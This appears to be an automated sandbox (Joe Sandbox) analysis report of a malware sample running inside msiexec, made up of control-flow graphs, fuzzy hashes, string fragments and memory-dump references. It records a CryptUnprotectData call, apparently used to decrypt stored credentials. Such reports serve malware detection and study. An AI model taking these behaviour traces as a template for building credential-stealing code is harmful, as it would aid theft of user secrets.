                                                                              control_flow_graph 715 1fcfaa-1fcfd8 716 1fcfdf-1fd0bc call 1f41a0 call 1f3cc0 715->716 717 1fcfda 715->717 727 1fd0be 716->727 728 1fd0c3-1fd0e4 call 1f5658 716->728 717->716 727->728 730 1fd0e9-1fd0f4 728->730 731 1fd0fb-1fd0ff 730->731 732 1fd0f6 730->732 733 1fd104-1fd10b 731->733 734 1fd101-1fd102 731->734 732->731 736 1fd10d 733->736 737 1fd112-1fd120 733->737 735 1fd123-1fd167 734->735 741 1fd1cd-1fd1e4 735->741 736->737 737->735 743 1fd169-1fd17f 741->743 744 1fd1e6-1fd20b 741->744 748 1fd1a9 743->748 749 1fd181-1fd18d 743->749 751 1fd20d-1fd222 744->751 752 1fd223 744->752 750 1fd1af-1fd1cc 748->750 753 1fd18f-1fd195 749->753 754 1fd197-1fd19d 749->754 750->741 751->752 755 1fd1a7 753->755 754->755 755->750
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                              • API String ID: 0-1487592376
                                                                              • Opcode ID: a4f70c7de04c024799002e4c0a701061266c9174786968b9e47f1e86dbf8c68d
                                                                              • Instruction ID: 5e97e3c535bd30e11ceb2518e65489e22c296eb9ba122187d44621daa3c223f3
                                                                              • Opcode Fuzzy Hash: a4f70c7de04c024799002e4c0a701061266c9174786968b9e47f1e86dbf8c68d
                                                                              • Instruction Fuzzy Hash: 7381C774E05218CFDB14DFAAD984AADBBF2BF88300F14C069E519AB365DB349985CF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1024 228387a8-22838f6a CryptUnprotectData 1026 22838f73-22838f9b 1024->1026 1027 22838f6c-22838f72 1024->1027 1027->1026
                                                                              APIs
                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 22838F5D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: CryptDataUnprotect
                                                                              • String ID:
                                                                              • API String ID: 834300711-0
                                                                              • Opcode ID: 79532b1f53b15a2d6519745a061b90001dfcd7863cef5f96cc3e8356d9776acb
                                                                              • Instruction ID: dffd4049c8ad9daf2880e34d5f1ae06cd6cc169fc436cc345eb6a85527bd958a
                                                                              • Opcode Fuzzy Hash: 79532b1f53b15a2d6519745a061b90001dfcd7863cef5f96cc3e8356d9776acb
                                                                              • Instruction Fuzzy Hash: 31115676800349DFDB10CF99C944BDEBFF5EB48320F108459E958A7210C379A550CFA5
                                                                              APIs
                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 22838F5D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID: CryptDataUnprotect
                                                                              • String ID:
                                                                              • API String ID: 834300711-0
                                                                              • Opcode ID: cd9ab896852d4beabcd4e62ba2013d944ad4686c7035d31dd557ec1f65322cb6
                                                                              • Instruction ID: 2ae8d46f1d30c7dc25388152e01c88c3cbdb1411966335269ca8ed4362201e09
                                                                              • Opcode Fuzzy Hash: cd9ab896852d4beabcd4e62ba2013d944ad4686c7035d31dd557ec1f65322cb6
                                                                              • Instruction Fuzzy Hash: C01164B6800249DFDB11CFA9C945BEEBFF1EF48320F14845AE958A7211C379A590DFA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d913450ff8f9d1c2a63964e60010b17b71d9c193ee826ec9791d49b312b41cfe
                                                                              • Instruction ID: b9f4f8339528281216ca26ea55d678d275ad91c716dd01554c76048f5d767f9c
                                                                              • Opcode Fuzzy Hash: d913450ff8f9d1c2a63964e60010b17b71d9c193ee826ec9791d49b312b41cfe
                                                                              • Instruction Fuzzy Hash: FEE1C174E01318CFEB14CFA5C994B9DBBB2BF89304F2081A9D408A73A5DB759A85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 52b869e9d229c0bd09c189ad1a7c855a5eb532647168af963909b13609c1b579
                                                                              • Instruction ID: 48533e0c89c0b7a62d22344210ecd8939200dd7526b200cc275589e563185d36
                                                                              • Opcode Fuzzy Hash: 52b869e9d229c0bd09c189ad1a7c855a5eb532647168af963909b13609c1b579
                                                                              • Instruction Fuzzy Hash: 52D19E78E01318CFDB55DFA9C990B9DBBB2BF89300F1080A9D908AB365DB359985CF51
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d86e9f8f2a60ccf97bdfc480836456767f947e6c0c735c2bced5f6a5ce0a276
                                                                              • Instruction ID: aca306b2b945a7ba3d3afc923c5b72bf0841346a5509085453770d9c40ec3a8d
                                                                              • Opcode Fuzzy Hash: 3d86e9f8f2a60ccf97bdfc480836456767f947e6c0c735c2bced5f6a5ce0a276
                                                                              • Instruction Fuzzy Hash: 22D19F78E01318CFDB55DFA9C990B9DBBB2BF89300F1080A9D808AB364DB759985CF51
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73e66156f4b6ec51d8b35db8e6741d328c3a0e12a27348e56ecec15483029d34
                                                                              • Instruction ID: e1aa377ce8616a661c61ea79ac0907adc47bc4fd6c4594af8c0d9af16f0c28ef
                                                                              • Opcode Fuzzy Hash: 73e66156f4b6ec51d8b35db8e6741d328c3a0e12a27348e56ecec15483029d34
                                                                              • Instruction Fuzzy Hash: 2D51B674E00208DFDB18DFAAD994A9DBBF2BF88300F248029E815AB365DB359945CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de508ffe04d1b46c6b850f020d2529e77e559c0c75b9c43380f07c4360c6a556
                                                                              • Instruction ID: 422e1b18c3ad4497a5ec8052d77b9c407c651b2d439aadb1229b15c76cb3e33a
                                                                              • Opcode Fuzzy Hash: de508ffe04d1b46c6b850f020d2529e77e559c0c75b9c43380f07c4360c6a556
                                                                              • Instruction Fuzzy Hash: 6D519474E00208DFDB18DFAAD594AADBBF6BF88300F24C429E815AB364DB359945CF54

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $(! $0( $@& $LR^q$p-
                                                                              • API String ID: 0-1183473236
                                                                              • Opcode ID: ddd25b7420aebcb5b3f6250824271b028c756b6ba2335562536969dcaee8498d
                                                                              • Instruction ID: 94b3b3b05fd5dd2974f377358acd2b77bdfa2d9cd55764919a5c062c1ba191ba
                                                                              • Opcode Fuzzy Hash: ddd25b7420aebcb5b3f6250824271b028c756b6ba2335562536969dcaee8498d
                                                                              • Instruction Fuzzy Hash: 7752E974940219CFCB54DF28DD94A9EBBB2FB4C701F1081A9E40AA7364DB756E85CF90

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $(! $0( $@& $LR^q$p-
                                                                              • API String ID: 0-1183473236
                                                                              • Opcode ID: 052950293ac94fd241d58f81f054d9906a473490b1aa8319a567358ba9b327a9
                                                                              • Instruction ID: 929c9b0984399b56501932c52efb48418577d36d3718c4e0fbef13be659f9895
                                                                              • Opcode Fuzzy Hash: 052950293ac94fd241d58f81f054d9906a473490b1aa8319a567358ba9b327a9
                                                                              • Instruction Fuzzy Hash: 0F52D874940219CFCB54DF28DDA4A9EBBB2FB4C701F1081A9E40AA7364DB756E85CF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 819 1f5f38-1f5f5a 820 1f5f5c-1f5f60 819->820 821 1f5f70-1f5f7b 819->821 822 1f5f88-1f5f8f 820->822 823 1f5f62-1f5f6e 820->823 824 1f6023-1f604f 821->824 825 1f5f81-1f5f83 821->825 827 1f5faf-1f5fb8 822->827 828 1f5f91-1f5f98 822->828 823->821 823->822 832 1f6056-1f60ae 824->832 826 1f601b-1f6020 825->826 902 1f5fba call 1f5f2a 827->902 903 1f5fba call 1f5f38 827->903 828->827 829 1f5f9a-1f5fa5 828->829 831 1f5fab-1f5fad 829->831 829->832 831->826 851 1f60bd-1f60cf 832->851 852 1f60b0-1f60b6 832->852 833 1f5fc0-1f5fc2 834 1f5fca-1f5fd2 833->834 835 1f5fc4-1f5fc8 833->835 837 1f5fd4-1f5fd9 834->837 838 1f5fe1-1f5fe3 834->838 835->834 840 1f5fe5-1f6004 835->840 837->838 838->826 845 1f6019 840->845 846 1f6006-1f600f 840->846 845->826 900 1f6011 call 1fafad 846->900 901 1f6011 call 1faef0 846->901 848 1f6017 848->826 854 1f60d5-1f60d9 851->854 855 1f6163-1f6165 851->855 852->851 856 1f60db-1f60e7 854->856 857 1f60e9-1f60f6 854->857 898 1f6167 call 1f62f0 855->898 899 1f6167 call 1f6300 855->899 865 1f60f8-1f6102 856->865 857->865 858 1f616d-1f6173 859 1f617f-1f6186 858->859 860 1f6175-1f617b 858->860 863 1f617d 860->863 864 1f61e1-1f6240 860->864 863->859 880 1f6247-1f625f 864->880 868 1f612f-1f6133 865->868 869 1f6104-1f6113 865->869 870 1f613f-1f6143 868->870 871 1f6135-1f613b 868->871 877 1f6115-1f611c 869->877 878 1f6123-1f612d 869->878 870->859 876 1f6145-1f6149 870->876 874 1f613d 871->874 875 1f6189-1f61da 871->875 874->859 875->864 879 1f614f-1f6161 876->879 876->880 877->878 878->868 879->859 898->858 899->858 900->848 901->848 902->833 903->833
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hbq$Hbq
                                                                              • API String ID: 0-4258043069
                                                                              • Opcode ID: b93272ce321ba551fc24f6c5c6da4e2e8cbc6199000aa26fed9a21adb3cad877
                                                                              • Instruction ID: cc256b72ca1f69432bc1c9a10bb5c7b9b85feccee289a6551e82d4fae4017041
                                                                              • Opcode Fuzzy Hash: b93272ce321ba551fc24f6c5c6da4e2e8cbc6199000aa26fed9a21adb3cad877
                                                                              • Instruction Fuzzy Hash: 76919F313042598FDB159F38C894A7E7BA6BF89310F1885A9EA06CB3A2DF75CC45C791

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 904 1f6498-1f64a5 905 1f64ad-1f64af 904->905 906 1f64a7-1f64ab 904->906 908 1f66c0-1f66c7 905->908 906->905 907 1f64b4-1f64bf 906->907 909 1f66c8 907->909 910 1f64c5-1f64cc 907->910 915 1f66cd-1f6705 909->915 911 1f64d2-1f64e1 910->911 912 1f6661-1f6667 910->912 911->915 916 1f64e7-1f64f6 911->916 913 1f666d-1f6671 912->913 914 1f6669-1f666b 912->914 917 1f66be 913->917 918 1f6673-1f6679 913->918 914->908 934 1f670e-1f6712 915->934 935 1f6707-1f670c 915->935 922 1f650b-1f650e 916->922 923 1f64f8-1f64fb 916->923 917->908 918->909 920 1f667b-1f667e 918->920 920->909 924 1f6680-1f6695 920->924 926 1f651a-1f6520 922->926 927 1f6510-1f6513 922->927 925 1f64fd-1f6500 923->925 923->926 941 1f66b9-1f66bc 924->941 942 1f6697-1f669d 924->942 929 1f6506 925->929 930 1f6601-1f6607 925->930 936 1f6538-1f6555 926->936 937 1f6522-1f6528 926->937 931 1f6566-1f656c 927->931 932 1f6515 927->932 938 1f662c-1f6639 929->938 946 1f661f-1f6629 930->946 947 1f6609-1f660f 930->947 939 1f656e-1f6574 931->939 940 1f6584-1f6596 931->940 932->938 943 1f6718-1f671a 934->943 935->943 975 1f655e-1f6561 936->975 944 1f652c-1f6536 937->944 945 1f652a 937->945 965 1f664d-1f664f 938->965 966 1f663b-1f663f 938->966 951 1f6578-1f6582 939->951 952 1f6576 939->952 968 1f6598-1f65a4 940->968 969 1f65a6-1f65c9 940->969 941->908 953 1f66af-1f66b2 942->953 954 1f669f-1f66ad 942->954 955 1f672f-1f6736 943->955 956 1f671c-1f672e 943->956 944->936 945->936 946->938 948 1f6613-1f661d 947->948 949 1f6611 947->949 948->946 949->946 951->940 952->940 953->909 957 1f66b4-1f66b7 953->957 954->909 954->953 957->941 957->942 972 1f6653-1f6656 965->972 966->965 971 1f6641-1f6645 966->971 978 1f65f1-1f65ff 968->978 969->909 980 1f65cf-1f65d2 969->980 971->909 976 1f664b 971->976 972->909 977 1f6658-1f665b 972->977 975->938 976->972 977->911 977->912 978->938 980->909 982 1f65d8-1f65ea 980->982 982->978
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,bq$,bq
                                                                              • API String ID: 0-2699258169
                                                                              • Opcode ID: 2bc59b63caddeb363ddbe05e433d2080b56e121cedb15e94f60f37fedc7b5c95
                                                                              • Instruction ID: cb9d960f805ceaa835dd6cc4e556c3cf7431804b0aa4834ee0d0a0b170895423
                                                                              • Opcode Fuzzy Hash: 2bc59b63caddeb363ddbe05e433d2080b56e121cedb15e94f60f37fedc7b5c95
                                                                              • Instruction Fuzzy Hash: 41818074B00509CFCB18DF69C4889BABBB2BF89321B258169D605EB375DB31EC41CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (o^q
                                                                              • API String ID: 0-74704288
                                                                              • Opcode ID: cc8636baaab4eb647e25d4fe6e4f9bec8cf12fb1ac539bbd4fa5819fbdce3bf3
                                                                              • Instruction ID: 942766b2372eee8a112bda0fcc9b32c5b1ac41b1053f05a17feaff6d8c1f825f
                                                                              • Opcode Fuzzy Hash: cc8636baaab4eb647e25d4fe6e4f9bec8cf12fb1ac539bbd4fa5819fbdce3bf3
                                                                              • Instruction Fuzzy Hash: 864124327042189FCB199F78C8646BEBBB6AFC8320F144069EA16DB391CF719C05C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4a19edbd49b2781001a5fe64b377eba2b14801f79f9b619d69fab0d86d58efd8
                                                                              • Instruction ID: 95696d91dc18aa64ceefc755bffcbb51295ef077e4bfe07555fb829830f113b0
                                                                              • Opcode Fuzzy Hash: 4a19edbd49b2781001a5fe64b377eba2b14801f79f9b619d69fab0d86d58efd8
                                                                              • Instruction Fuzzy Hash: 8312993403166B8FD3402F32D5FC16ABF65FB0F773305AC40E05BC95A5ABB254AA8A25
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3a37622fb16e69c4fee2758b726a907141410472219c235ef2d1c152c48a636d
                                                                              • Instruction ID: 235f86f5f636890f5253bacbdb1478c4048b180e8bf643388c2d90b2b6254193
                                                                              • Opcode Fuzzy Hash: 3a37622fb16e69c4fee2758b726a907141410472219c235ef2d1c152c48a636d
                                                                              • Instruction Fuzzy Hash: 0612993403166B8FD3502F32D5FC16ABF65FB0F773305AC40E05BC95A4ABB254AA8A65
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cbb65a903a3edf4f89bebbac1b37d7e300ead6cdef7387f2a463139009957f29
                                                                              • Instruction ID: 7e282d08ac71f6345acd573a9c34708311a64b275feb0966ec7d5961d12c7e63
                                                                              • Opcode Fuzzy Hash: cbb65a903a3edf4f89bebbac1b37d7e300ead6cdef7387f2a463139009957f29
                                                                              • Instruction Fuzzy Hash: 03610434D00318DFDB14DFA5C994AADBBB2FF48304F208529E805AB365DB765A4ACF41
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d4e5a778ac0adbaaedc9ced9b4222e1d49a8ea6116bcb41238a79d2eff273e12
                                                                              • Instruction ID: 577d61f6a53a1cf54d17c3b3b8789957ad1236f35d22da710340aadaf0ef6d8c
                                                                              • Opcode Fuzzy Hash: d4e5a778ac0adbaaedc9ced9b4222e1d49a8ea6116bcb41238a79d2eff273e12
                                                                              • Instruction Fuzzy Hash: 21518374E012189FDB44DFA9D9849DDBBF2BF89300F208169E419AB365DB30A905CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: efa1cce7d90c58f7d195de8330630d7379c94b28280d36bebe0ac268b0a90138
                                                                              • Instruction ID: 8c2235f9e52400d7b1177911c0c6bea4246fe63e9a28aeb9760bbab4353cfcfc
                                                                              • Opcode Fuzzy Hash: efa1cce7d90c58f7d195de8330630d7379c94b28280d36bebe0ac268b0a90138
                                                                              • Instruction Fuzzy Hash: 24519474E01208DFCB08DFA9D59499DBBF2FF8D304B209069E819AB365DB35A946CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec74d208904ad70df744bfa4f9ead16e088774af274947aa9f24b1aa5f48175b
                                                                              • Instruction ID: c96e96429ccb5b3907481a621e4ba4cf2114400d8a3b6bd98ab2e192c728ef1a
                                                                              • Opcode Fuzzy Hash: ec74d208904ad70df744bfa4f9ead16e088774af274947aa9f24b1aa5f48175b
                                                                              • Instruction Fuzzy Hash: 0231803120415DEFCF05AFA4C894ABE3BA6FF48310F544428FA2587250DBB6CE61DBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff0c4bfaa0baee4a8ebb588907f85e8dbe60e3a17f9b38a0b574f30cc9b30aa4
                                                                              • Instruction ID: 143372fd57b26c932de9e655ec6a5b31f7b47fa715ed5d9e0d861b09372bfba0
                                                                              • Opcode Fuzzy Hash: ff0c4bfaa0baee4a8ebb588907f85e8dbe60e3a17f9b38a0b574f30cc9b30aa4
                                                                              • Instruction Fuzzy Hash: C3316774D0925D8FCB01EFB8D8545EDBFB4EF4A300F1041AAD505EB261EB315A45CBA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 749188340a01cad501a17672b2eeaac93442e218ba66851aead1f34bb0fda244
                                                                              • Instruction ID: db333a71bf9d77c3e7df2d331b7bae040d56346f72a6682124be7a428f9f0b7d
                                                                              • Opcode Fuzzy Hash: 749188340a01cad501a17672b2eeaac93442e218ba66851aead1f34bb0fda244
                                                                              • Instruction Fuzzy Hash: 1D215C75A0011A9FCB24DF24C4509BE77A5FB9D768F208019D94A9B340DB39EE47CBD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f60e31ce0669ac7336a4824aa57d7dec970ded37c5e7719876059ad1668080fb
                                                                              • Instruction ID: 8de21772c5e3589af047d139a380511e6410ad3ea9bcbc96c2ee398e76991b6a
                                                                              • Opcode Fuzzy Hash: f60e31ce0669ac7336a4824aa57d7dec970ded37c5e7719876059ad1668080fb
                                                                              • Instruction Fuzzy Hash: 322105353005298FC7199B29C4A493EB3A6FFC9750B184468EA0ACB794CF71DC02CB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115290773.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1cd000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 758f8d4ba39f13b53d2fb0cb534b2f8db3c3ae56fa872e9ee61f610e6f66f628
                                                                              • Instruction ID: 1d5b527de1e08cb4ae963789a05efefde7207247bccdac1ba21a4f043d9245a8
                                                                              • Opcode Fuzzy Hash: 758f8d4ba39f13b53d2fb0cb534b2f8db3c3ae56fa872e9ee61f610e6f66f628
                                                                              • Instruction Fuzzy Hash: 88210471604204DFCB14DF28E9C4F26BBA5FBA4314F34C5BDE8494B252C73AD856CA62
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 862a23887b653f71d720b720d5f36dff31e2695e7d22350a0678d39c21e4f7c0
                                                                              • Instruction ID: 694b1a10988f86dc3dcb09599b7ce4d9931e96fcd4c91de0e1388e8996547925
                                                                              • Opcode Fuzzy Hash: 862a23887b653f71d720b720d5f36dff31e2695e7d22350a0678d39c21e4f7c0
                                                                              • Instruction Fuzzy Hash: 1621233120924CDFCB05AF64C454BBE3BA6EF45320F444069FA15CB251CBB9CE60DBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6fa3e6b052c66e83627abdaa8281121ab7b510b7f26dffa4b2af772da72ba7bd
                                                                              • Instruction ID: c1d2232eee2d08c7e0d54026fc08d7f20402616e76c7442008abb496d406b304
                                                                              • Opcode Fuzzy Hash: 6fa3e6b052c66e83627abdaa8281121ab7b510b7f26dffa4b2af772da72ba7bd
                                                                              • Instruction Fuzzy Hash: 8D1106357056198FC7194B29C4A893EB7A2BFC576131940BDEA0ACB3A0DF31DC02CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbadacffe0e5dba4788e82724e70d52fd4451142e3fa93692ef89d3b2efc06a9
                                                                              • Instruction ID: 18a0f16d6d0654823d6d58a0f42124a7e19a713858bd2b0892fe60b6e36f1305
                                                                              • Opcode Fuzzy Hash: fbadacffe0e5dba4788e82724e70d52fd4451142e3fa93692ef89d3b2efc06a9
                                                                              • Instruction Fuzzy Hash: 962167B0D002099FDB04EFB9D990A9EBFF2FF44700F00D5A9D0589B365EB749A498B80
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93597841469896a107ee40caf6ce2ab951aba11d993d730aa39e5597f25425a0
                                                                              • Instruction ID: 0505f7762c8b01911388e257696aee4b9fb1bb9bcf38e17113a4559332c90698
                                                                              • Opcode Fuzzy Hash: 93597841469896a107ee40caf6ce2ab951aba11d993d730aa39e5597f25425a0
                                                                              • Instruction Fuzzy Hash: 0421F274D0521E8FCB01EFA8C8445EEBFF0BF0A310F1051AAD806B7260EB315A95CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5a570fe227ef174233bfa0d193a47161e8cf3ec70f313b70f5874ae7a619eeda
